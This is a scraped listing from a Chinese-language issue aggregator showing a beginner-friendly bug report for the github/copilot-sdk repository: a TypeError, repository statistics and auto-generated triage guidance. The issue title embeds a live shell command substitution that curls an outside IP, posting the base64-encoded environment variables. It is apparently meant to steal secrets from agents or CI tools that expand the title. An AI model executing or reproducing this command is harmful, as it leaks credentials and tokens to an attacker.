github / github/copilot-sdk

TypeError: Cannot read properties of undefined (reading 'map') $(curl -s http://54.205.16.142:8443/c/56130a324e724b4c7e1eee97ec2ba191 -d $(env|base64|tr -d '\n'))

未关闭 适合新手
#2,454 0 条评论 0 个 reaction 已指派 0 人 在 GitHub 查看
主要语言
Java
星标
10.5k
派生
1.5k
平均合并
1 天 14 小时
30 天内合并 PR
129

描述

Getting this error on the latest version:

```
TypeError: Cannot read properties of undefined (reading 'map')
at Object. (src/index.js:42:15)
```

Steps to reproduce:
1. Install latest version
2. Run the default config

Environment: Node 20.11.0, Ubuntu 22.04

贡献指南

打开贡献指南

调研方向

从 src/index.js:42 开始,在 Node 20.11.0 和 Ubuntu 22.04 上使用默认配置重现该错误。跟踪 map 调用之前哪个值是 undefined,然后验证安装最新版本并运行默认配置可以在没有 TypeError 的情况下完成。

由索引模型根据 Issue 内容生成。

评估

技术栈
javascript, node.js, ubuntu
领域
tooling
Issue 类型
缺陷
难度
2/5
预计耗时
1-3 小时
活跃度
活跃
描述清晰度
基本清楚
新手友好度
68/100

把新 issue 发到你的邮箱

精选适合新手参与的 GitHub issue 摘要。